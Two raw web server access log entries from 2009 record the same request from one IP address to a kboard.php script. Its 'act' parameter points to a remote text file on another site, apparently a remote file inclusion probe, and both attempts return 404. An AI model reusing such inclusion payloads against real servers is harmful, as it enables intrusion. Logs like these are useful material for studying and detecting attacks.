62.75.202.55 - - [11/Sep/2009:03:44:15 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:44:15 -0500] "GET /logs/access_log.1244764800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
